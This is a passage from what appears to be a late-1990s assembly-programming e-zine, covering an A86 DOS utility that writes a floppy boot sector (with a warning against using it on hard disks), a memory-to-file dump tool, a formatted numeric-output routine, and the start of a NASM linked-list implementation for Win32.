  - open the file to transfer to the bootsector
  - read file into internal buffer
  - close the file
  - repeat 5 times:
  -   try to tranfer buffer to bootsector of drive A:
  - shut down and return to DOS.
  - if an error occurs, the user is informed about it.

That's all there's to it.


The Source.
-----------
Below is the sourcecode for this short utillity. I have commented just
about any line I thought fit for it.

----------- Wrs.A86 --------------------------------------- Start ---------
name     wrs
title    WRite Sector
page     80, 120

stdout   =  1                       ; the "standard" equates
lf       = 10
cr       = 13

   DATA segment                      ; define the volatile data area

buffer   db    512 dup (?)          ; this is enough for one sector

          EVEN                       ; make sure WORD starts at an even address
Handle   dw    ?                    ; handle number of file to write
; ----------------------
   CODE segment                      ; start of the actualk code
                                     ; no ORG, so we start at offset 0100
          jmp   main                 ; jump forward to entry point

          db    'VeRsIoN=0.2', 0
          db    'CoPyRiGhT=CopyLeft 1999, Jan Verhoeven, '
          db    'jverhoeven@...', 0
; ----------------------
filename db    'BootLoad.bin', 0        ; name of file to send to disk

Mess001  db    'Cannot open file BootLoad.bin. '
          db    'Operation aborted.', cr, lf
Len001 = $ - Mess001

Mess002  db    'Something went wrong while writing to disk.', cr, lf
Len002 = $ - Mess002

Mess003  db    'The floppy disk subsytem reported an error. '
          db    'Trying once more.', cr, lf
Len003 = $ - Mess003

Mess004  db    cr, lf, 'Bootsector written. '
          db            'Thank you for using this software.'
          db    cr, lf, 'This program is GNU GPL free software and you use '
          db            'it at your won risk.'
          db    cr, lf, 'Please study the GNU '
          db            'General Public License for more details.', cr, lf
Len004 = $ - Mess004
; ----------------------
Error1:  mov   dx, offset mess001   ; process "cannot open file"
          mov   cx, len001
          mov   bx, stdout
          mov   ah, 040
          int   021                  ; print via DOS

          mov   ax, 04C01            ; exit with errorcode = 1
          int   021
; ----------------------
Error2:  mov   dx, offset mess002   ; process "disk error"
          mov   cx, len002
          mov   bx, stdout
          mov   ah, 040
          int   021                  ; via DOS

          mov   ax, 04C02            ; exit with errorcode = 2
          int   021
; ----------------------
Error2a: push  ax, bx, cx, dx       ; process "Disk not ready"
          mov   dx, offset mess003   ; point to message
          mov   cx, len003           ; this many bytes
          mov   bx, stdout           ; to the console
          mov   ah, 040              ; do a write
          int   021                  ; via DOS
          pop   dx, cx, bx, ax       ; restore state of machine
          ret                        ; and return to caller
; ----------------------
main:    mov   dl, 0                ; choose drive A:
          mov   ah, 0                ; select funtion 0 ...
          int   013                  ; ... reset diskdrives

          mov   dx, offset filename  ; point to name of file
          mov   ax, 03D00            ; to open
          int   021                  ; via DOS
          jc    Error1               ; if error, take action

          mov   [Handle], ax         ; no error, => ax = handle
          mov   dx, offset buffer    ; setup pointer, ...
          mov   cx, 512              ; ... byte count, ...
          mov   bx, ax               ; ... and handle
          mov   ah, 03F              ; to read data from file
          int   021                  ; via DOS

          mov   bx, [Handle]
          mov   ah, 03E
          int   021                  ; close this file

          mov   cx, 5                ; prepare for a five times LOOP
L0:      push  cx
          mov   bx, offset buffer
          mov   es, ds               ; es:bx = buffer to read from
          mov   dx, 0000             ; drive A:, head 0
          mov   cx, 0001             ; Track 0, Sector 1
          mov   ax, 0301             ; Write sectors, 1 sector
          int   013                  ; via BIOS
          jnc   >L1                  ; if no error, jump forward
          pop   cx                   ; Houston, we have an error!
          call  error2a              ; inform the user
          loop  L0                   ; and try again
          jc    error2               ; after five times still no go....

L1:      mov   dx, offset Mess004   ; Signal that we're successful
          mov   cx, Len004
          mov   bx, stdout           ; to the console
          mov   ah, 040
          int   021                  ; via DOS (so it can be redirected)
          mov   ax, 04C00            ; mention that there were no errors
          int   021                  ; and return to DOS

----------- Wrs.A86 ---------------------------------------- End ----------

Have fun experimenting with bootsectors. But take care that this will NOT
work on a hard disk.


Hard disk structure.
--------------------
A hard disk uses another layout for it's structure. The very first sector
of a HDD is the MBR (Master BootRecord). It is the only sensible sector in
the first track of a normal HDD. The rest is just empty.

Each partition starts at a cylinder boundary, so the first one starts at
cylinder 1 (track 1, side 0, sector 1). The very first sector of a bootable
partition is the bootsector.

The MBR contains the partition table, indicating where partitions start and
end and whether they are bootable or not. Plus some code to interpret that
table and to find the bootsector that was selected.


If you write a floppy disk bootsector to the very first sector of a HDD,
you wipe out the MBR and hence make inaccesable all data on that disk. The
data will still be there, but the system will not be able anymore to find
or use it.

So please take care that this software is NOT used for drive (DL=) 080.

jverhoeven@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                          Dumping Memory To Disk
                                                          by Jan Verhoeven


This piece of code allows you to make a memory dump of any region of
conventional memory (i.e. below 1 Mb) to a diskfile.


The program itself.
-------------------
The source is documented so it speaks for itself. At points of
interest I have insterted "break" and "restart" lines with space for
additional remarks.

So just read the source and read the remarks. This way, the text is
where the code is, and you don't need to go back and forth in the
text. I think this will easier to read than explanation afterwards.


--- Mem2File ------------------------------------------------- Start ---

name     mem2file
title    Send an area of memory to a diskfile.
page     80, 120

; version 1.0 : Had to be compiled for each area/filename   OK: 01-01-1991
; version 1.1 : Same as above, for A86 format               OK: 01-01-1999
; version 1.2 : Make it commandline driven                  OK: 01-02-1999
; version 1.3 : Make it reliable                            OK: 02-02-1999
; ----------------------
stdout   =  1
tab      =  9
lf       = 10
cr       = 13

clr MACRO               ; macro called CLeaR
     mov  #1, 0          ; move it with zero
     #EM                 ; and get outa here

Dum1   STRUC            ; a structure definition
OffVal   dw    ?
SegVal   dw    ?
        ENDS
; ----------------------
   DATA segment          ; this is where the volatile data lives

ByteF = $
dummy    db    ?        ; just to fool D86....
                         ; if this dummy variable is not here, D86 will
                         ; reference variable "Start" as "ByteF".
          even
Start    dw    ?, ?     ; segment:address to start
Stop     dw    ?, ?     ; segment:address to stop
Blocks   dw    ?        ; number of 16K chucks to save
Rest     dw    ?        ; remaining part to save
ArgNum   dw    ?        ; nr of bytes in this argument
OldClp   dw    ?        ; current pointer into command line
Handle   dw    ?
Length   dw    ?, ?

FileName:                       ; this storage is used twice....
Argument db     80 dup (?)      ; storage for next argument from command-line
Output   db    16K dup (?)      ; buffered output

--- Mem2File ------------------------------------------------- Break ---

An A86 enhancement: if you need 16K elements of data, just ask for it.
No need to remember that 16 Kb is 16.384 bytes. The "K" will do.

No big deal, just a nice feature.

Also, if you need to process large binary numbers you may group them
into sub-units separated by underscores. So the number:

         1000100100111101

is hard to read back. But if we insert "_" markers like:

         1000_1001_0011_1101

the grouping of bits makes them easier to understand. Not that it is a
matter of life and death, but it can come in handy once in a while.

--- Mem2File ------------------------------------------------ Restart --

Bytes = $ - ByteF               ; number of volatile databytes
; ----------------------
   CODE segment                  ; no ORG, so we start at 0100

          jmp   main

HexTable db    '0123456789ABCDEF', 0

          db    'VeRsIoN=Mem2File 1.3', 0
          db    'CoPyRiGhT=CopyLeft Jan Verhoeven, jverhoeven@...', 0

Mess001  db    'Mem2File collects a part of conventional memory and '
          db    'sends it to a file.', cr, lf, lf
          db    'The syntax is:', cr, lf, lf
          db    tab, 'Mem2File  segm1:offs1 [-] segm2:offs2 '
          db    '<path>file.ext.', cr, lf, lf
          db    'Mem2File is GNU GPL style FREE software. ', cr, lf
          db    'Please read the GNU GPL if you are in doubt.', cr, lf, lf

Mess002  db    'Mem2File was made by Jan Verhoeven, NL-5012 GH 272, '
          db    'The Netherlands', cr, lf
          db    'E-mail address : jverhoeven@...', cr, lf, lf
Len001 = $ - Mess001
Len002 = $ - Mess002

Mess004  db    7, 'Error! All numbers are expected to be hexadecimal.'
          db    cr, lf
Len004 = $ - Mess004
;------------------------
InitMem: mov   di, ByteF        ; Init volatile memory with zero's.
          mov   cx, Bytes        ; saves a lot of strange problems.
          mov   al, 0
          rep   stosb
          ret
;------------------------
--- Mem2File ------------------------------------------------- Break ---

I use volatile data to store data that does not need initialising. This
saves a lot of diskspace and it loads a lot faster. Drawback of volatile
data can be that any rubbish left there by other programs can make your
software go berzerk if you yourself forget to initialise the data.

Therefore I -always- prime the volatile data memory with zero's. Just to
have a well defined starting position.

It should not be necessary, but, on the other hand, how much overhead
and extra execution time is such an initialisation routine?

--- Mem2File ------------------------------------------------ Restart --

L0:      mov   b [di], 0        ; terminate argument string
          mov   [OldClp], si     ; done, => clean up.
          clc                    ; indicate "No Error"
L3:      pop   di, si, ax       ; restore registers, ...
          ret                    ; ... and leave.

GetArg:  push  ax, si, di       ; get next argument from command-line in ASCIIZ
format
          mov   si, [OldClp]     ; now, where did we leave last time?
          cmp   si, 0            ; Have we ever used this routine?
          IF  E mov  si, 081             ; if not, prime SI, ...
          mov   di, offset Argument      ; ... DI and ...
          mov   [ArgNum], 0              ; ... nr of chars in argument.
L1:      lodsb                  ; get byte
          cmp   al, ' '          ; skip over spaces, ...
          je    L1
          cmp   al, tab          ; ... and tabs.
          je    L1
          cmp   al, 1            ; ONLY if AL is 0, we get a carry
          jc    L3               ; if CARRY, we're done

--- Mem2File ------------------------------------------------- Break ---

This construction is what I particularly like. I want to check if AL is
Zero. Normally you can code

          cmp   al, 0
          jz    L3

but L3 is the error-exit and needs the carrybit to be set as an error
flag. Normally you would enter a

          stc

instruction to fullfill the specification. But that is poor programming.
It is better to let the software do this for us.

AL can have any value between 020 and 0FF, plus 00, tab, lf and cr. 01
is not an option. So the sequence

          cmp   al, 1            ; ONLY if AL is 0, we get a carry
          jc    L3               ; if CARRY, we're done

will send us to the errorexit WITH the carryflag set, all in one,
without explicitly having to set the carry flag.

--- Mem2File ------------------------------------------------ Restart --

L2:      stosb                  ; else store char in Arguments array
          inc   [ArgNum]         ; adjust counter
          lodsb                  ; and get next char
          cmp   al, ' '          ; is it a delimiting space?
          je    L0
          cmp   al, tab          ; or a tab?
          je    L0
          cmp   al, ':'          ; or a colon?
          je    L0
          cmp   al, 0            ; or an end-of-line?
          jne   L2               ; if not, loop back,
          mov   si, 0FFFF        ; else make SI ridiculously high, ...
          stc                    ; ... set carry flag, ...
          jmp   L0               ; and get out.

--- Mem2File ------------------------------------------------- Break ---

Ok, ok, ok. I was influenced to make this function by a compiler. No, it
wasn't C. It was Modula-2.

GetArg (if necessary A86 can operate in a case sensitive mode!) extracts
the next argument from the command tail. It puts it in a seperate buffer
at address "Arument" which can hold 80 bytes. Shoyuld be more than
enough for one word or expression.

--- Mem2File ------------------------------------------------ Restart --

;------------------------
L1:      stc                    ; byte not in table!
          pop   dx               ; we came here with carry set!
          ret                    ; exit

L2:      sub   bx, dx           ; calculate position in table
          pop   dx
          clc                    ; make sure carry is cleared
          ret

--- Mem2File ------------------------------------------------- Break ---

This is a typical A86 construction. The subroutine is called TableFind
and it starts in the next line and ends in the previous one!

This is done to have the local labels declared for when they are needed
in the main functionbody. All jumps are "backward". For the CPU there's
no big influence, but for the assembler there is. No guessing about
labels.

--- Mem2File ------------------------------------------------ Restart --

TableFind:                      ; find AL in ASCIIZ table [BX] ...
          push  dx               ; ... and report position
          mov   dx, bx           ; keep value of SI
L0:      cmp   b [bx], 0        ; is it end of table?
          je    L1               ; if so, jump out
          cmp   al, [bx]         ; compare byte with table
          je    L2               ; if same, jump out
          inc   bx               ; else increment pointer
          jmp   L0               ; and loop back
;------------------------
MakeUpper:
          cmp   al, 'a'          ; too low?
          jb    ret

--- Mem2File ------------------------------------------------- Break ---

An A86 enhancement: a conditional return instruction. All sensible CPU's
have conditional CALL and RET instructions. Not the 80x86 line. This CPU
was meant to be structured.

So you have to put a conditional jump before the call, and introduce yet
another silly labelname for the next instruction.

The  "Jcc   ret"  is a good way to circumvent this ommission. What it
does is the same as what, on a Z-80, would be done with a  "RET  cc"
instruction.

There is one catch, however: there must be a RET instruction within
reach PRIOR to the "Jcc   Ret" (internal) macro.

If that is a problem, you could also use the line:

         IF cc  Ret

So either way you, the programmer, win.

--- Mem2File ------------------------------------------------ Restart --

          cmp   al, 'z'          ; if in range, ...
          ja    ret
          and   al, not bit 5    ; ... make uppercase

--- Mem2File ------------------------------------------------- Break ---

A86 is very programmer-oriented and allows us to write down what and how
we think. So if I need to set bit 0 of register Ax, I will simply write

          or    ax, bit 0

Any value between 0 and 15 is valid in A86 (0 - 31 for A386) to refer to
the respective bit in the respective source.

--- Mem2File ------------------------------------------------ Restart --

          ret
;------------------------
BadNumber:                      ; hey typo, you made a dumbo!
          mov   dx, offset Mess004
          mov   cx, Len004
          mov   bx, StdOut
          mov   ah, 040
          int   021

          mov   ax, 04C02        ; and exit with errorcode 2
          int   021
;------------------------
SyntErr: mov   dx, offset Mess001
          mov   cx, Len001
          mov   bx, StdOut
          mov   ah, 040          ; print out "help" screen and ...
          int   021

          mov   ax, 04C01        ; ... exit with errorcode 1
          int   021
;------------------------
L8:      mov   ax, dx           ; Convert has result in DX, that's why.
          pop   dx, bx
          ret

Convert: push  bx, dx           ; convert ASCII to Hex.
          mov   si, offset Argument
          clr   dx               ; dx will contain result

--- Mem2File ------------------------------------------------- Break ---

Here the macro is invoked. It is used to load the DX register with
zero. If later you decide to change the way in which you want to clear
registers, just change the macro.

In LST files (the assembler listings) the expansions are controlled by
means of the +L switch. If you issue the option "+L35" macro's will not
be expanded in the listings file.

--- Mem2File ------------------------------------------------ Restart --

L1:      lodsb                  ; get first character
          cmp   al, 0            ; end of string?
          je    L8
          call  MakeUpper                ; if not, make uppercase
          mov   bx, offset HexTable
          call  TableFind                ; and lookup in table
          jc    BadNumber
          shl   dx, 4            ; multiply DX by 16

--- Mem2File ------------------------------------------------- Break ---

This is another A86 goody. I coded a  "SHL  DX, 4" instruction, although
I do not know what the target processor will be.

No problem with A86. It will find out with which CPU you are assembling
and use that. If your CPU supports this function, it is implemented as
such. If it doesn't this instruction is expanded as a macro into the
following:

          shl   dx, 1
          shl   dx, 1
          shl   dx, 1
          shl   dx, 1

More code in the executable, but it makes programming easier.

If on a modern CPU, you can force A86 to act as if the CPU were a
vintage 88 with the commandline switch +P65.

--- Mem2File ------------------------------------------------ Restart --

          or    dl, bl           ; bx = index into table
          jmp   L1               ; repeat until done
;------------------------
Credits: mov   dx, offset Mess002
          mov   cx, Len002
          mov   bx, stdout
          mov   ah, 040
          int   021              ; print some egotripping data
          ret
;------------------------

main:    call  InitMem          ; prime volatile data
          mov   al, [080]        ; get tail length
          cbw                    ; make 16 bits long
          mov   si, 081          ; point to start of tail
          add   si, ax           ; point to end of tail
          mov   [si], ah         ; make commandtail ASCIIZ
          call  GetArg           ; get argument from command tail
          jc    SyntErr          ; if error, get out
          call  Convert                  ; convert text to hex
          mov   [Start.SegVal], ax       ; store it
          call  GetArg                   ; etcetera
          jc    SyntErr
          call  Convert
          mov   [Start.OffVal], ax

L0:      call  GetArg
          jc    SyntErr
          cmp   b [Argument], '-'        ; single '-' character?
          je    L0                       ; if so, ignore it
          call  Convert
          mov   [Stop.SegVal], ax
          call  GetArg
          jc    SyntErr
          call  Convert
          mov   [Stop.OffVal], ax

          call  GetArg
          IF  C jmp  SyntErr

--- Mem2File ------------------------------------------------- Break ---

This is one of the A86 enhancements. This IF construct prevents that you
have to make up all kinds of ridiculous labelnames like jmp_001F in a
construct as follows:

          call  GetArg
          jnc   jmp_01F
          jmp   SyntErr
jmp_01F: ...

The IF construct (not to be confused with the "#IF" construct which is
for conditional assemblies) enables you to just make a fast jump by
stating the reverse condition in the IF statement and acting further
like a high level language:

          IF  C jmp  SyntErr

Neat, isn't it?

--- Mem2File ------------------------------------------------ Restart --

          mov   si, offset Argument
          add   si, [ArgNum]
          mov   b [si], 0                ; make it ASCIIZ

          mov   dx, offset FileName      ; same as Argument buffer....
          mov   cx, 0
          mov   ah, 03C
          int   021                      ; create the file
          IF  C jmp  SyntErr

--- Mem2File ------------------------------------------------- Break ---

See how powerful the IF construct can be? It is a very convenient way to
circumvent the foolish conditional instructions of the x86 architecture.

--- Mem2File ------------------------------------------------ Restart --

          mov   [Handle], ax

          mov   ax, [Stop.SegVal]
          mov   dx, 0                    ; prime DX
          mov   cx, 4
L0:      shl   ax, 1
          rcl   dx, 1
          loop  L0                       ; shift upper 4 bits of address into DX
          add   ax, [Stop.OffVal]
          adc   dx, 0                    ; now, dx:ax = linear address to stop at
          mov   [Stop.SegVal], dx
          mov   [Stop.OffVal], ax        ; store linear address STOP

          mov   ax, [Start.SegVal]
          mov   dx, 0                    ; prime DX
          mov   cx, 4
L0:      shl   ax, 1
          rcl   dx, 1
          loop  L0                       ; shift upper 4 bits of address into DX
          add   ax, [Start.OffVal]
          adc   dx, 0                    ; now, dx:ax = linear address to start
from
          mov   [Start.SegVal], dx
          mov   [Start.OffVal], ax       ; store linear address START

          cmp   dx, [Stop.SegVal]        ; start > stop?
          ja    >L1                      ; fix it!
          jb    >L2

--- Mem2File ------------------------------------------------- Break ---

A86 likes to have as much as possible labels declared before they are
referenced. That's why many times there is code "before" the subroutine
name is declared.

For local labels (i.e. labels that consist of 1 letter and the rest
decimal digits) it is a MUST that they are defined before being
referenced.

If, for some reason, you do not want to put a label backwards in memory,
you can forward reference a local label by prefixing it with a ">" sign.
A86 now knows that the local label still has to come. Not a luxury since
many A86 programmers can do with 4 or 5 local labels in over 2000 lines
of code.... Especially L0 is always very well available.

--- Mem2File ------------------------------------------------ Restart --

          cmp   ax, [Stop.OffVal]        ; start > stop?
          jbe   >L2                      ; if not, OK
L1:      push  [Stop.SegVal]
          push  [Stop.OffVal]            ; swap start and stop addresses
          mov   [Stop.SegVal], dx
          mov   [Stop.OffVal], ax
          pop   [Start.OffVal]
          pop   [Start.SegVal]

L2:      mov   dx, [Stop.SegVal]
          mov   ax, [Stop.OffVal]
          add   ax, 1
          adc   dx, 0                    ; limits are INCLUSIVE
          sub   ax, [Start.OffVal]
          sbb   dx, [Start.SegVal]       ; dx:ax = bytes to move

          shl   ax, 1
          rcl   dx, 1
          shl   ax, 1
          rcl   dx, 1                    ; dx = nr of 16 Kb blocks to move
          mov   [Blocks], dx             ; store it
          shr   ax, 2                    ; ax = remainder to move
          mov   [Rest], ax               ; save it

          mov   ax, [Start.SegVal]       ; end of linear addressing, we're going
to DOS!
          mov   cl, 12
          shl   ax, cl
          mov   [Start.SegVal], ax

          mov   es, ds           ; use es to refer to data
          mov   bx, [Handle]
          lds   dx, d [Start]

--- Mem2File ------------------------------------------------- Break ---

Normally this instruction would require a secretary with 100 letters per
minute typing rate:

          lds   dx, dword ptr [Start]

But the "ptr" argument is always the same, so it is only there to please
the assembler and humiliate the programmer: entering data that nobody
needs.

Therefore A86 only needs the first letter of such prose. In our case:
the "dword ptr" is abbreviated to a "d". "Byte ptr" is a "b". "Word Ptr"
is a "w". Simple as that.

So if your coding skills outweigh your typing speed, you should consider
switching to the superior assembler. :)

--- Mem2File ------------------------------------------------ Restart --

       es cmp   [Blocks], 0      ; if less than 16 Kb, skip this one.

--- Mem2File ------------------------------------------------- Break ---

For people who still remember that  "Seg  ES"  is a legal instruction
(used for a segment override) this might bring back memories.

A86 allows the user to put the segmentation override before the actual
instruction. This way, the operand field looks neater. And it is also
the way in which D86 shows segmentation overrides.

--- Mem2File ------------------------------------------------ Restart --

          je    >S0
          mov   cx, 16K
L0:      mov   ah, 040
          int   021
          mov   ax, ds           ; store ds into ax
          add   dx, 04000        ; next buffer to load data from
          IF  C add  ax, 01000   ; if carry, inc ds
          mov   ds, ax           ; ds:dx now ready for next bufferfull of data

       es dec   [Blocks]
          jnz   L0

S0:   es cmp   [Rest], 0
          je    >L1
          mov   ah, 040
       es mov   cx, [Rest]
          int   021
L1:      mov   ds, es

          mov   bx, [Handle]
          mov   ah, 03E
          int   021              ; close file

          call  Credits          ; show my ego
          mov   ax, 04C00
          int   021              ; exit to DOS

--- Mem2File -------------------------------------------------- End ----

That's it.

jverhoeven@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                        Formatted Numeric Output
		                                        by Laura Fairhead


    Here I am going to present you with a very useful routine for numeric
output. I have been using it myself for sometime and now I think it is
almost perfect.

    It consists of 2 basic API's. The first (nuconvs), you call when you
want to change the parameters of the main routine (nuconv). You simply call
it with one DWORD in EAX, this specifies the following:

   EAX = SSFFPPRR           (hexadecimal value of course)
   SS    size    size of the datum you will be calling the main routine with,
                 only 3 values are valid:
                         0=byte
                         1=word
                         2=dword
   FF    field   size of a field in which to right-justify the number,
                 if this is = 0 then there is no right-justification you
                 only get the number
   PP    pad     the ASCII value of the character to use to right-justify
                 the number in the field of output
   RR    radix   the radix to output the number in

    Once you've set the control parameters you can call the main routine
(nuconv) freely to do the work. You call the main routine with ES:DI set
to where the output is to be stored, and the value to be output in AL or
AX or EAX (depending on what data size you set).

    I use the word 'output' here which might conjure up images of the screen,
but in fact what we are doing here is writing all the ASCII to memory.
This is much more powerful than incorporating all that OS/application
specific nonsense, and it really doesn't cost much overhead at all (in
fact this is the way C does it and even though I **HATE** C, here it is
right on the mark;)

    Here is the code:

================START OF CODE==============================================
;
;nuconvs- set control parameters for 'nuconv'
;
;     !!  this must be called at least once before calling nuconv
;
;entry:   EAX=SSFFPPRR  (hex digits)
;
;         where:  SS=data size (0=byte,1=word,2=dword)
;                 FF=field size (0=none)
;                 PP=pad char
;                 RR=radix (2-16)
;
;     !!  these parameters must be set correctly by the application
;     !!  they are not validated in anyway and invalid parameters
;     !!  will cause undefined operation
;
;exit:    (all registers preserved)
;

nuconvs PROC NEAR
         MOV DWORD PTR CS:[nuradix],EAX
         RET
nuconvs ENDP

;
;control parameters
;
;   !!  these absolutely must be in the below order due to the way the above
;       routine works
;

nuradix DB ?            ;output radix
nupad   DB ?            ;pad character
nufld   DB ?            ;field size
nudsiz  DB ?            ;data size

;
;nuconv- output value in accumalator -> ES:DI
;
;     !! see 'nuconvs' header for more information
;
;entry:  AL|AX|EAX=value to output
;        ES:DI=address to write output data
;
;        size of accumulator that is used depends on what the current data
;        size is ( as specified by a previous call to 'nuconvs' )
;
;
;exit:   DI=updated to offset of last character + 1
;
;        (all other registers preserved)
;

nuconv  PROC NEAR
;
;all registers are going to be preserved
;
         PUSH DS
         PUSH EAX
         PUSH EBX
         PUSH CX
         PUSH EDX
;
;save some CS: overrides
;
         PUSH CS
         POP DS
;
;initialise
;
; set EBX =radix
;     CX  =fieldsize
;
; also we zero pad out the datum passed so it fills EAX
;
         XOR EBX,EBX

         CMP BL,BYTE PTR DS:[nudsiz]
         JNP SHORT ko1
         JS SHORT ko0
         MOV AH,0
ko0:    DEC BX
         AND EAX,EBX
         INC BX
ko1:

         MOV BL,BYTE PTR DS:[nuradix]
         MOV CH,0
         MOV CL,BYTE PTR DS:[nufld]
;
;calculate digits and push to stack
;
;  EAX is divided and modulus taken which is the standard way,
;  loop exits when it reaches 0 or the field size is hit
;  notice that if CX=0 on entry to this then the field size
;  will be effectively unbounded
;
nulop0: XOR EDX,EDX
         DIV EBX
         PUSH DX
         AND EAX,EAX
         LOOPNZ nulop0
;
;'output' the field padding
;
;  the number of padding characters is normally the value
;  now in CX (ie: fieldsize - digits ). however no pad chars
;  should be output if field size = 0. i think the check here
;  for this is nice and tight (read the code...)
;
         MOV BX,CX
         NEG BX
         JNS SHORT ko
         MOV AL,BYTE PTR DS:[nupad]
         REP STOSB
ko:
;
;'output' all the digits
;
;  CX is set to the number of digits on the stack we have to output
;  ie: fieldsize - ( fieldsize - digits )
;
         MOV CH,0
         MOV CL,BYTE PTR DS:[nufld]
         ADD CX,BX
;
;  now we pop off those #CX digits translating into ASCII using a nice
;  variation of the traditional speed method
;
         MOV BX,OFFSET nudat

nulop1: POP AX
         XLAT
         STOSB
         LOOP nulop1
;
;  restore all registers and exit (in case it wasn't obvious!)
;
         POP EDX
         POP CX
         POP EBX
         POP EAX
         POP DS
         RET
;
nudat   DB "0123456789ABCDEF"
;
nuconv  ENDP

==================END OF CODE==============================================



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                             Linked Lists in ASM
                                                             by mammon_


Assembly language is notorious for being low-level; to wit, it lacks many of
the features in higher-level languages which make programming easier. In the
course of my work in the visasm project I have put quite a bit of time into
working on exactly which higher language features are important and which, in a
nutshell, are swill.

One of the areas in which assembly language is lacking is the use of dynamic
structures. Pointer manipulation in asm is simple and clear for up to one
level of redirection; further redirection causes the code to quickly become a
confusion of register juggling and indirect addressing. As a result,
implementing even a simple linked list in assembly language can be tedious
enough to make one rewrite the project in C.

In this article I have undertaken an implementation of a linked list in NASM;
the implementation is generic enough to support more complex data structures,
and should port to other assemblers with few changes.

To begin with, one must define the memory allocation routines for use in the
application; I have chosen Win32 for convenience. The routines defined below
are for local heap allocation and for the Win32 console interface to allow the
use of STDOUT on the console.
;=========================================================Win32 API Definitions
STD_INPUT_HANDLE     EQU        -10     ;nStdHandle types
STD_OUTPUT_HANDLE    EQU        -11
STD_ERROR_HANDLE     EQU   -12

EXTERN AllocConsole                     ;BOOL AllocConsole()
EXTERN GetStdHandle                     ;HANDLE GetStdHandle( nStdHandle )
EXTERN WriteConsoleA  ;HANDLE hConsole, lpBuffer, Num2Write, lpWritten,NULL
EXTERN ExitProcess    ;UINT ExitCode
EXTERN GetProcessHeap ;
EXTERN HeapAlloc      ;HANDLE hHeap,DWORD dwFlags, DWORD dwBytes:ret ptr
EXTERN HeapFree       ;HANDLE hHeap,DWORD dwFlags, LPVOID lpMem
EXTERN HeapReAlloc    ;HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,DWORD dwBytes
EXTERN HeapDestroy    ;HANDLE hHeap
%define HEAP_NO_SERIALIZE               0x00000001
%define HEAP_GROWABLE                   0x00000002
%define HEAP_GENERATE_EXCEPTIONS        0x00000004
%define HEAP_ZERO_MEMORY                0x00000008
%define HEAP_REALLOC_IN_PLACE_ONLY      0x00000010
%define HEAP_TAIL_CHECKING_ENABLED      0x00000020
%define HEAP_FREE_CHECKING_ENABLED      0x00000040
%define HEAP_DISABLE_COALESCE_ON_FREE   0x00000080
%define HEAP_CREATE_ALIGN_16            0x00010000
%define HEAP_CREATE_ENABLE_TRACING      0x00020000
%define HEAP_MAXIMUM_TAG                0x0FFF
%define HEAP_PSEUDO_TAG_FLAG            0x8000
%define HEAP_TAG_SHIFT                  16
;===========================================================End API Definitions


In addition, it is useful to define a few common routines for use later:
;==============================================================Utility Routines
[section data class=DATA use32]             ;set up the segments early
%macro STRING 2+
%1:      db %2
.end:
%define %1.length  %1.end - %1
%endmacro
[section code class=CODE use32]

GetConsole:
;GetConsole()
[section data]
hConsole        DD      0
[section code]
         call AllocConsole
	 push dword STD_OUTPUT_HANDLE
	 call GetStdHandle
         mov [hConsole], eax
         xor eax, eax
         ret

puts:
;puts( ptrString, NumBytes )
[section data]
NumWrote        DD 0
[section code]
%define _ptrString ebp + 8
%define _strlen ebp + 12
         push ebp
         mov ebp,esp
         push eax
         push dword 0
	 push dword NumWrote
         mov eax, [ _strlen ]
         push dword eax
         mov eax, [ _ptrString ]
         push dword eax
         push dword [hConsole]
         call WriteConsoleA
         pop eax
	 mov esp, ebp
	 pop ebp
         ret 8
;==========================================================End Utility Routines
The STRING macro is particular interesting; it allows one to define a string
in the data segment as
         STRING label, 'contents of string',0Dh,0Ah
while defining the constant label.length as the total length of the string.
This will come in handy during the many calls to puts, which is used to write
to the Win32 console. Puts has the syntax
         puts( lpString, strLength )
and returns the result of WriteConsole, a BOOL value. GetConsole is a routine
provided to move the Win32 console allocation code out of the main program; it
takes no parameters and defines the hConsole handle.

The linked list implementation has been designed to be extendable; the routine
names are prefaced with underscores to avoid filling up the namespace of the
linked list application, and the routines themselves are generic enough to be
called from higher-level Stack, Queue, and List implementations. The Linked
List interface is as follows:
         ptrHead    _create_list( hHeap, NodeSize )
         void       _delete_list( hHeap, ptrHead)
         ptrNode    _add_node( hHeap, ptrPrev, NodeSize )
         void       _delete_node( hHeap, ptrPrev, ptrNode )
         void       _set_node_data( ptrNode, NodeOffset, data )
         DWORD data _get_node_data( ptrNode, NodeOffset )
The names of the routines should make their intent apparent; note however that
NodeSize is assumed to be the size of a LISTSTRUCT structure.
;====================================================Linked List Implementation
[section data]
;Define .next as offset Zero for use in generic functions
     struc _llist
      .next:      resd 1                         ;this is basically a constant
     endstruc

;Macro to ensure that .next is always at offset zero in user-defined lists
%macro LISTSTRUCT 1
   struc %1
   .next:        resd 1
%endmacro
%macro END_LISTSTRUCT 0
   endstruc
%endmacro

[section code]
;Note that these assume an LISTSTRUCT base type
_create_list:
; ptrHead_create_list( hHeap, NodeSize )
%define _hHeap ebp + 8
%define _ListSize ebp + 12
         ENTER 0 , 0
         push dword [_ListSize]                  ;size of LISTSTRUCT
         push dword HEAP_ZERO_MEMORY             ;FLAG for HeapAlloc
         push dword [_hHeap]                     ;Heap being used
	 call HeapAlloc
         test eax, eax
         jz .Error                               ;Alloc failed!
         mov [eax + _llist.next], dword 0        ;.next pointer = NULL
.Exit:  LEAVE                                   ;eax = ptrHead
         ret 8
.Error: xor eax, eax                            ;error = return NULL
         jmp .Exit

_delete_list:
; _delete_list( hHeap, ptrHead)
%define _hHeap ebp + 8
%define _ptrHead ebp + 12
         ENTER 0, 0
         push eax
         push ebx                                ;save registers
         mov eax, [_ptrHead]                     ;eax = addr of list head node
.DelNode:
         mov ebx, [eax + _llist.next]            ;ebx = [eax].next
         push eax                                ;free addr in eax
         push dword 0                            ;FLAG
         push  dword [_hHeap]                    ;local heap
         call HeapFree
         test ebx, ebx                           ;is [eax].next == NULL?
         jz .Exit                                ;if yes then done
         mov eax, ebx                            ;loop until done
         jmp .DelNode
.Exit:  pop ebx
         pop eax
         LEAVE
         ret 8

_add_node:
; ptrNode _add_node( hHeap, ptrPrev, NodeSize )
%define _hHeap ebp + 8
